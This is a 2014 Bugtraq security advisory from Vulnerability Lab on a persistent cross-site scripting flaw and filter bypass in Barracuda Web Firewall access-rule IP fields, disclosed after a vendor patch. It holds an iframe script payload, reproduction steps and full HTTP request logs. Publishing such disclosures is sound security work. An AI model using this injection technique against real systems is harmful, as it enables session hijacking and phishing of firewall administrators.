[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Barracuda Networks Firewall Bug Bounty #32 - Filter Bypass & Persistent Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-02-25 11:23:32
Message-ID: 530C7D34.3010802 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Barracuda Networks Firewall Bug Bounty #32 - Filter Bypass & Persistent Web \
Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1069
Barracuda Networks Security ID (BNSEC): BNSEC-2069
Release Date:
=============
2014-02-24
Vulnerability Laboratory ID (VL-ID):
====================================
1069
Common Vulnerability Scoring System:
====================================
4
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by \
providing powerful network security, granular layer 7 application controls, user \
awareness and secure VPN connectivity combined with cloud-based malware protection, \
content filtering and reporting. It alleviates the performance bottlenecks in \
Unified Threat Management (UTM) appliances through intelligent integration of \
on-premise and cloud-based technologies. While the powerful on-premises appliance is \
optimized for tasks like packet forwarding and routing, Intrusion Prevention (IPS), \
DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like virus \
scanning, content filtering and usage reporting benefit from the scalable \
performance and elasticity of the cloud.
(Copy of the Vendor Homepage: https://www.barracuda.com/products/firewall )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple input validation web \
vulnerabilities in the Barracuda Networks Web Firewall appliance application.
Vulnerability Disclosure Timeline:
==================================
2013-09-27: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-09-28: Vendor Notification (Barracuda Networks Security Team - Bug Bounty \
Program)
2013-10-03: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty \
Program)
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Eric \
****** ]
2014-02-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Web Firewall 6.1.0.016 - Models: X100; X200; X300; X400 & X600
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities and a filter bypass issue has \
been discovered in the official Barracuda Networks Web Firewall appliance web \
application. The vulnerability allows remote attackers or local low privileged \
application user accounts to inject (persistent) own malicious script codes on \
application-side of the vulnerable module or connected module components.
The vulnerability is located in the `Firewall > Firewall Rules > Add Access Rule` \
module. The vulnerable input fields are `Source` and `Destination` IP Address in the \
general menu. Remote attackers are able to inject custom malicious script codes to \
the `Source` and `Destination` input fields as IP.
Attackers can also add new access rules into the application or edit the existing \
ones with their custom injected payloads.
To bypass the filter and to be able to save the injected code into the application, \
attacker needs to create 2 entries. First entry should be the Attackers payload and \
second entry should be any dummy IP address. Application only performs validation on \
the active field which is freshly added and ignores the earlier entries thus allowing \
successful injection of the script code into the application.
Exploitation of the persistent bug and filter bypass issue requires a low privileged \
application user account and low user interaction. Successful exploitation results \
in session hijacking, persistent phishing, persistent external redirects & \
persistent manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Application(s):
[+] Firewall (WAF) Appliance Application (X300Vx v6.1.0.016)
Vulnerable Module(s):
[+] Firewall > Firewall Rules > Add Access Rule > General
Vulnerable Parameter(s):
[+] fw_access_rule_src_net_type
[+] fw_access_rule_dst_net_type
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote \
attackers with low privileged web-application user account and low user interaction. \
For security demonstration or to reproduce the vulnerability follow the provided \
information and steps below.
Manual steps to reproduce the vulnerability:
1. Login with the user account to the barracuda networks web firewall appliance \
application 2. Goto Firewall > Firewall Rules > Add Access Rule > General
3. Fill the name and description with dummy data
4. Goto the IP "Source" input field, Inject the following Payload and click the + \
button to add.
%20"><iframe onload=prompt(/POC/) src=x></iframe>
5. You should now be able to see a javascript popup proving the existence of this \
vulnerability. 6. Add another entry and this time, insert a dummy IP and click the + \
button to add 7. In the IP "Destination" enter the same payload used above.
8. You should again see a javascript popup proving the existence of this \
vulnerability. 9. Add another entry and this time, insert a dummy IP and click the + \
button to add 10. Upon clicking save, You should now be able to Save your injected \
payload without any problems into the application.
POC:
IP Source:
<input class="new_button" id="add_src_inc_button" name="+" \
onclick="add_src_inc_pattern(1);" value="+" type="button"></td></tr> <tr \
class="network"><td>"><[PERSISTENT INJECTED SCRIPT CODE!]></td><td><input \
class="new_button" value="-" name="incip^"><[PERSISTENT INJECTED SCRIPT CODE!]>" \
type="button"></td></tr><tr class="network"> <td>127.0.0.2</td><td><input \
class="new_button" value="-" name="incip^127.0.0.2" \
type="button"></td></tr></tbody></table></td>
IP Destination:
<input disabled="" class="new_button" id="add_dst_inc_button" name="+" \
onclick="add_dst_inc_pattern(1);" value="+" type="button"></td></tr><tr \
class="network"><td>"><iframe onload="prompt(/POC/)" src="x"></iframe></td><td><input \
class="new_button" value="-" name="incip^"><[PERSISTENT INJECTED SCRIPT CODE!]>" \
type="button"></td></tr><tr class="network"> <td>127.0.0.5</td><td><input \
class="new_button" value="-" name="incip^127.0.0.5" \
type="button"></td></tr></tbody></table></td>
Reference(s):
https://firewall.ptest.localhost:6221/cgi-mod/index.cgi?
auth_type=Local&et=1378382541&locale=en_US&password=05e76e9aff6e382822aeb21d3903bcde&realm=&role=&user=guest&primary_tab=FIREWALL&secondary_tab=firewall_access_rules
--- PoC Request Session Logs ---
#1 Injecting Payload:
POST /cgi-mod/index.cgi HTTP/1.1
Host: firewall.ptest.localhost:6221
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://firewall.ptest.localhost:6221/cgi-mod/index.cgi?
password=10ee36dc6410fdaccebd0de679641b7c&et=1378385983&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&
auth_type=Local&update_type=add&locale=en_US&secon
dary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850
Content-Length: 259
Cookie: ys-fw_custom_user_objects5=o%3Acolumns%3Da%253Ao%25253Aid%25253Dn%2525253A1%25255Ewidth%25253Dn%2525253A150%25255Ehidden
%25253Db%2525253A1%255Eo%25253Aid
%25253Dn%2525253A2%25255Ewidth%25253Dn%2525253A150%255Eo%25253Aid%25253Dn%2525253A3%25255Ewidth%25253Dn%2525253A250%255Eo%25253Aid
%25253Dn%2525253A4%25255Ewidth
%25253Dn%2525253A200%255Eo%25253Aid%25253Dn%2525253A5%25255Ewidth%25253Dn%2525253A50
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ajax_action=check_param_ajax_single&name=UPDATE_fw_access_rule_src_inc_single&value=%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe
%3E&user=guest&password=16847fb7405afa069b908f770f5ea75c&et=1378385995&locale=en_US&auth_type=Local&realm=
Response:
HTTP/1.1 200 OK
Server: BarracudaFirewallHTTP 4.0
Date: Thu, 05 Sep 2013 12:43:37 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 166
[{"action":"error","message":"Illegal value ("><iframe ...) for <i>Source \
Include</i>: Invalid CIDR block","field":"UPDATE_fw_access_rule_src_inc_single"}]
#2 Inserting additional Valid dummy IP to bypass filter:
POST /cgi-mod/index.cgi HTTP/1.1
Host: firewall.ptest.localhost:6221
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://firewall.ptest.localhost:6221/cgi-mod/index.cgi?
password=10ee36dc6410fdaccebd0de679641b7c&et=1378385983&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local
&update_type=add&locale=en_US&secon
dary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850
Content-Length: 196
Cookie: ys-fw_custom_user_objects5=o%3Acolumns%3Da%253Ao%25253Aid%25253Dn%2525253A1%25255Ewidth%25253Dn%2525253A150%25255Ehidden%25253Db
%2525253A1%255Eo%25253Aid
%25253Dn%2525253A2%25255Ewidth%25253Dn%2525253A150%255Eo%25253Aid%25253Dn%2525253A3%25255Ewidth%25253Dn%2525253A250%255Eo%25253Aid%25253Dn
%2525253A4%25255Ewidth
%25253Dn%2525253A200%255Eo%25253Aid%25253Dn%2525253A5%25255Ewidth%25253Dn%2525253A50
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ajax_action=check_param_ajax_single&name=UPDATE_fw_access_rule_src_inc_single&value=127.0.0.1&user=guest&password=16847fb7405afa069b908f770f5ea75c&
et=1378385995&locale=en_US&auth_type=Local&realm=
Response:
HTTP/1.1 200 OK
Server: BarracudaFirewallHTTP 4.0
Date: Thu, 05 Sep 2013 12:46:39 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 2
#3 Final Save Request:
POST /cgi-mod/index.cgi HTTP/1.1
Host: firewall.ptest.localhost:6221
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://firewall.ptest.localhost:6221/cgi-mod/index.cgi?
password=2bc6bb8a9ed37744a427f8ced877e515&et=1378385551&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=
Local&update_type=add&locale=en_US&secon
dary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850
Content-Length: 2297
Cookie: ys-fw_custom_user_objects5=o%3Acolumns%3Da%253Ao%25253Aid%25253Dn%2525253A1%25255Ewidth%25253Dn%2525253A150%25255Ehidden
%25253Db%2525253A1%255Eo%25253Aid
%25253Dn%2525253A2%25255Ewidth%25253Dn%2525253A150%255Eo%25253Aid%25253Dn%2525253A3%25255Ewidth%25253Dn%2525253A250%255Eo%25253Aid
%25253Dn%2525253A4%25255Ewidth
%25253Dn%2525253A200%255Eo%25253Aid%25253Dn%2525253A5%25255Ewidth%25253Dn%2525253A50
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
auth_type=Local&et=1378385566&password=279846a33c95f3c4e29d25f6f4dc1b4c&primary_tab=FIREWALL&realm=&secondary_tab=firewall_access_rules&
user=guest&locale=en_US&popup_h
eight=850&popup_url=%2Fcgi-mod%2Findex.cgi%3Fpassword%3D2bc6bb8a9ed37744a427f8ced877e515%26et%3D1378385551%26primary_tab%3D
FIREWALL%26new_secondary_tab
%3Dfirewall_access_rules%26auth_type%3DLocal%26update_type%3Dadd%26locale%3Den_US%26secondary_tab%3Dadd_access_rule%26content_only%3D
1%26user%3Dguest%26backup_life
%3D0%26ispopup%3D1%26parent_name%3Dfirewall_access_rules%26popup_width%3D700%26popup_height
%3D850&popup_width=700&UPDATE_new_fw_access_rule_readonly=no&tabs_lasttab=tabs_tab_general&UPDATE_new_fw_access_rule_name=test&
UPDATE_new_fw_access_rule_disabled=&DEFA
ULT_new_fw_access_rule_disabled=no&UPDATE_new_fw_access_rule_desc=test&UPDATE_new_fw_access_rule_action=Allow&
UPDATE_new_fw_access_rule_connection=Dynamic
%20SNAT&DEFAULT_new_fw_access_rule_bidirectional=no&fw_access_rule_sel_services_left_list=&UPDATE_new_fw_access_rule_sel_services=&
UPDATE_new_fw_access_rule_src_inc_te
xt=%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe%3E%2C127.0.0.1&
UPDATE_new_fw_access_rule_src_inc=incip%5E%22%3E%3Ciframe%20onload%3Dprompt
(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe%3E%2Cincip%5E127.0.0.1&fw_access_rule_src_net_type=IP
%20Addresses&UPDATE_fw_access_rule_src_inc_single=127.0.0.1&src_nobjs_inc=Any
&UPDATE_new_fw_access_rule_dst_inc_text=%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC
%2F)%20src%3Dx%3E%3C%2Fiframe%3E%2C127.0.0.1&
UPDATE_new_fw_access_rule_dst_inc=incip%5E%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe%3E
%2Cincip%5E127.0.0.1&fw_access_rule_dst_net_type=IP
%20Addresses&UPDATE_fw_access_rule_dst_inc_single=127.0.0.1&UPDATE_new_fw_access_rule_bw_prio=internet&
UPDATE_new_fw_access_rule_app_policy=default&fw_access_rule_sel_
apps_left_list=&UPDATE_new_fw_access_rule_sel_apps=&fw_access_rule_sel_users_left_list=&
UPDATE_new_fw_access_rule_sel_users=&UPDATE_new_fw_access_rule_time_obj=&UPDATE
_new_fw_access_rule_iface_group=Matching&UPDATE_new_fw_access_rule_ips_policy=Default&
UPDATE_new_fw_access_rule_syn_fld_protection=Outbound&UPDATE_new_fw_access_rule_m
ax_sess=0&UPDATE_new_fw_access_rule_max_sess_per_src=0&ajax_action=check_param_ajax_full&add_fw_access_rule_name=Add
Response Headers:
HTTP/1.1 200 OK
Server: BarracudaFirewallHTTP 4.0
Date: Thu, 05 Sep 2013 12:35:32 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 2
Reference(s):
https://firewall.ptest.localhost:6221/cgi-mod/index.cgi
https://firewall.ptest.localhost:6221/cgi-mod/index.cgi?
auth_type=Local&et=1378382541&locale=en_US&password=05e76e9aff6e382822aeb21d3903bcde&realm=&role=&
user=guest&primary_tab=FIREWALL&secondary_tab=firewall_access_rules
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable \
fw_access_rule_src_net_type and fw_access_rule_dst_net_type values.
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Eric \
****** ]
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities are \
estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan \
(ateeq@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic